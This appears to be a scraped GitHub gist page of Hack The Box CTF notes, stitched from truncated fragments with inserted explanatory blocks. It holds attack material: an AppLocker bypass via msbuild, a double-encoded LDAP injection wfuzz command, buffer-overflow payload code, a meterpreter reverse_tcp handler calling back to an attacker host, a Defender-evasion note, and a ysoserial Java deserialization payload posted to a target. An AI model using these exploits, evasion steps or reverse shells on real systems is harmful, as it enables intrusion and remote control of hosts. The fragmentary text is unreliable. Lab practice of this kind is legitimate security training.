dualfade
Keybase proof

I hereby claim:

  • I am cdowns71 on github.
  • I am dualfade (https://keybase.io/dualfade) on keybase.
  • I have a public key ASDxw8oJN09Hj6abWb9Vc-BggpenCuRcRRWNa3j1r04UQwo

To claim this, I am signing this object:

@dualfade
dualfade / gist:41ea28b014a4375740af326ee5ad41ba
Created December 13, 2018 19:47
7zip-jtr.sh; lord and savior baby jesus
https://gist.githubusercontent.com/bcoles/421cc413d07cd9ba7855/raw/fd8b6f0d63f88c334beb45d2615c8097f06743b6/7zip-jtr.sh
#!/bin/bash
# 7zip-JTR Decrypt Script
#
# Clone of JTR Decrypt Scripts by synacl modified for 7zip
# - RAR-JTR Decrypt Script - https://synacl.wordpress.com/2012/02/10/using-john-the-ripper-to-crack-a-password-protected-rar-archive/
# - ZIP-JTR Decrypt Script - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
echo "7zip-JTR Decrypt Script";
# Expect exactly two arguments: the archive and the wordlist fed to john
if [ $# -ne 2 ]
then
  echo "Usage: $0 <7zip file> <wordlist>";
  exit 1;
fi
https://github.com/jpillora/chisel
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
└[~/go/src/github.com/jpillora/chisel]> cd $GOPATH/src/github.com/jpillora/chisel
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
└[~/go/src/github.com/jpillora/chisel]> go build
┌[cdowns@7242-alpha-reticuli] [/dev/pts/14] [master]
└[~/go/src/github.com/jpillora/chisel]> ls -l chisel
-rwxr-xr-x 1 cdowns cdowns 10539193 Jan 28 04:24 chisel*
//Applocker bypass - Windows 2016 (Build 14393) x64
//C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SoiYtuH7.xml
//Microsoft (R) Build Engine version 4.6.1586.0
//[Microsoft .NET Framework, version 4.0.30319.42000]
//Copyright (C) Microsoft Corporation. All rights reserved.
//Build started 2/5/2019 8:55:26 PM.
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
@dualfade
dualfade / WFUZZ_LDAP_Injection.txt
Created March 9, 2019 16:51
LDAP Encoded Filter Bypass - Find valid attributes
./wfuzz -c -s 1 -z file,/home/cdowns/Documents/Hack_The_Box/CTF/ldap_attributes_all.txt,double,urencode -d 'inputUsername=ldapuser%2529%2528FUZZ%253D%252A&inputOTP=password' --hw 233 -u 'http://10.10.10.122/login.php' -p 127.0.0.1:8080
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.122/login.php
Total requests: 2026
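The wfuzz command above injects `ldapuser)(FUZZ=*` into the username field, double URL-encoded (`%2529%2528...%253D%252A`), so that after the server's own decoding it closes the user clause of the LDAP filter and appends an attribute wildcard; the `--hw 233` flag hides responses whose word count matches the (presumably failed-login) baseline, so only attribute names the directory actually knows show up. The following Python is an added illustration, not the gist's own code, of how that value is built and how it is peeled back; `FILTER_TEMPLATE` is an assumed server-side filter, not something taken from the target.

```python
#!/usr/bin/env python3
"""Double URL-encoding of an LDAP filter injection, as sent by the wfuzz command above."""
from urllib.parse import quote, unquote

USERNAME = "ldapuser"  # the known-valid user from the gist's command line

# Assumption for illustration only: a typical login filter into which the username is spliced.
FILTER_TEMPLATE = "(&(uid=%s)(userPassword=%s))"


def ldap_attr_probe(attr, user=USERNAME):
    """Value that, once decoded by the server, closes the user clause and adds (attr=*)."""
    return "%s)(%s=*" % (user, attr)


def encode_layers(value, layers=2):
    """Percent-encode `value` `layers` times. safe='' makes quote() encode ( ) = * too,
    so the second pass turns every '%' of the first pass into '%25'."""
    for _ in range(layers):
        value = quote(value, safe="")
    return value


def decode_layers(value):
    """Peel URL encoding until the string stops changing; returns every intermediate form,
    which is what the server (or a proxy in front of it) sees at each decoding step."""
    seen = [value]
    while True:
        nxt = unquote(seen[-1])
        if nxt == seen[-1]:
            return seen
        seen.append(nxt)


def rendered_filter(decoded_user, password="x"):
    """Show where the injected clause lands inside the assumed filter template."""
    return FILTER_TEMPLATE % (decoded_user, password)


if __name__ == "__main__":
    probe = ldap_attr_probe("mail")
    wire = encode_layers(probe)
    print(wire)                              # what replaces FUZZ on the wire
    for layer in decode_layers(wire):
        print("  ->", layer)
    print(rendered_filter(decode_layers(wire)[-1]))
```

Any attribute name that exists for the user yields a filter that still matches, so the response differs from the baseline and survives `--hw`; attributes the schema does not have produce an error or the baseline page and are hidden.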
@dualfade
dualfade / gist:ca19bf238f04bc568199d23b7b83af65
Created March 14, 2019 22:14
JTR pkzip OMP_NUM_THREADS=
/home/cdowns/Github/JohnTheRipper/run/./zip2john exploitme.zip > exploitme.john
ver 2.0 efh 5455 efh 7875 exploitme.zip/membermanager PKZIP Encr: 2b chk, TS_chk, cmplen=3166, decmplen=10224, crc=32B64CF9
ver 2.0 efh 5455 efh 7875 exploitme.zip/memo PKZIP Encr: 2b chk, TS_chk, cmplen=3775, decmplen=13304, crc=FC9CDB4F
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
4 CORE OPTION --
NO POINT IN CRUSHING MY 8 CORES INTO THE GROUND --
@dualfade
dualfade / gist:1f4aec48c1a48dd8719430989df1d277
Created March 14, 2019 22:23
pwntools BO EUID Exec test --
#!/usr/bin/env python
import struct
from pwn import *

def gen_payload(start_addr, shellcode):
    context.arch = 'amd64'
    # Opcode for the NOP instruction
    nop = asm('nop', arch="amd64")
    nop1 = nop * 72  # Create first NOP sled
#!/usr/bin/env python
from struct import *
# bytes 400 --
buf = ""
# offset to RIP
buf += "A"*72
# overwrite RIP --
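Both snippets above rely on the same numbers: 72 bytes from the start of the buffer to the saved RIP, a NOP sled, shellcode, and a little-endian 64-bit return address that must land inside the sled. The block below is an added example, not the gist's code, that builds and sanity-checks that layout with only the standard library (no pwntools); the 8-byte `int3` stub standing in for shellcode and the addresses used are constructed placeholders, not values from the target.

```python
#!/usr/bin/env python3
"""Stack-overflow payload layout for a 72-byte offset to the saved RIP (x86-64)."""
import struct

OFFSET_TO_RIP = 72   # from the gist: "A"*72 reaches the saved return address
NOP = b"\x90"        # single-byte x86-64 NOP

# Constructed stand-in for real shellcode: int3 breakpoints, NOT a setuid/execve stub.
STUB_SHELLCODE = b"\xcc" * 8


def bad_chars(shellcode, forbidden=b"\x00\x0a"):
    """Bytes in `shellcode` that a strcpy/gets-style copy would truncate on (NUL, newline)."""
    return sorted(set(b for b in shellcode if b in forbidden))


def gen_payload(start_addr, shellcode, offset=OFFSET_TO_RIP, sled_len=64):
    """Layout: [NOP sled][shellcode][padding up to RIP][start_addr].

    start_addr must point somewhere inside the sled; execution then slides into the
    shellcode. Raises if the shellcode has bad chars or does not fit before RIP."""
    bad = bad_chars(shellcode)
    if bad:
        raise ValueError("shellcode contains bad chars: %r" % bad)
    body = NOP * sled_len + shellcode
    if len(body) > offset:
        raise ValueError("sled + shellcode (%d) exceeds offset to RIP (%d)"
                         % (len(body), offset))
    pad = b"A" * (offset - len(body))      # fill the rest of the buffer up to RIP
    ret = struct.pack("<Q", start_addr)    # little-endian 64-bit saved return address
    return body + pad + ret


def rip_value(payload, offset=OFFSET_TO_RIP):
    """Recover the 8 bytes that land in the saved RIP slot (checks the offset arithmetic)."""
    return struct.unpack("<Q", payload[offset:offset + 8])[0]


def lands_in_sled(buffer_addr, start_addr, sled_len=64):
    """True if the chosen return address falls inside the sled that starts at buffer_addr."""
    return buffer_addr <= start_addr < buffer_addr + sled_len


if __name__ == "__main__":
    buf_addr = 0x7FFFFFFFE000                 # constructed example buffer address
    target = buf_addr + 16                    # land a few NOPs into the sled
    p = gen_payload(target, STUB_SHELLCODE)
    print(len(p), hex(rip_value(p)), lands_in_sled(buf_addr, target))
```

Picking a return address in the middle of the sled rather than at its start is what makes the exploit tolerant of small stack-address shifts between the debugger and the real process, which is the usual reason a sled is used at all.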
@dualfade
dualfade / gist:48c45fb47ff273a3996c9a4f10ac9d72
Created March 26, 2019 05:43
Microsoft Windows Server 2019 Standard ( 10.0.17763 N/A Build 17763 ) - WD / BL Evasion - Priv Esc Lateral Move
MODIFIED VEIL HANDLER --
msfc -r /var/lib/veil/output/handlers/3fb7Jq79.rc
/*
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.13
set LPORT 3434
set ExitOnSession false
exploit -j
import hashlib
import hmac
import base64
import requests
url = 'http://10.10.10.130:8080/userSubscribe.faces'
# re check the payload maybe generate it from kali (ysoserial pipe to base64) and make sure it is java 8 in order for it to work.
payload = 'rO0ABXNyAC5qYXZheC5tYW5hZ2VtZW50LkJhZEF0dHJpYnV0ZVZhbHVlRXhwRXhjZXB0aW9u1Ofaq2MtRkACAAFMAAN2YWx0ABJMamF2YS9sYW5nL09iamVjdDt4cgATamF2YS5sYW5nLkV4Y2VwdGlvbtD9Hz4aOxzEAgAAeHIAE2phdmEubGFuZy5UaHJvd2FibGXVxjUnOXe4ywMABEwABWNhdXNldAAVTGphdmEvbGFuZy9UaHJvd2FibGU7TAANZGV0YWlsTWVzc2FnZXQAEkxqYXZhL2xhbmcvU3RyaW5nO1sACnN0YWNrVHJhY2V0AB5bTGphdmEvbGFuZy9TdGFja1RyYWNlRWxlbWVudDtMABRzdXBwcmVzc2VkRXhjZXB0aW9uc3QAEExqYXZhL3V0aWwvTGlzdDt4cHEAfgAIcHVyAB5bTGphdmEubGFuZy5TdGFja1RyYWNlRWxlbWVudDsCRio8PP0iOQIAAHhwAAAAA3NyABtqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnRhCcWaJjbdhQIABEkACmxpbmVOdW1iZXJMAA5kZWNsYXJpbmdDbGFzc3EAfgAFTAAIZmlsZU5hbWVxAH4ABUwACm1ldGhvZE5hbWVxAH4ABXhwAAAAU3QAJnlzb3Nl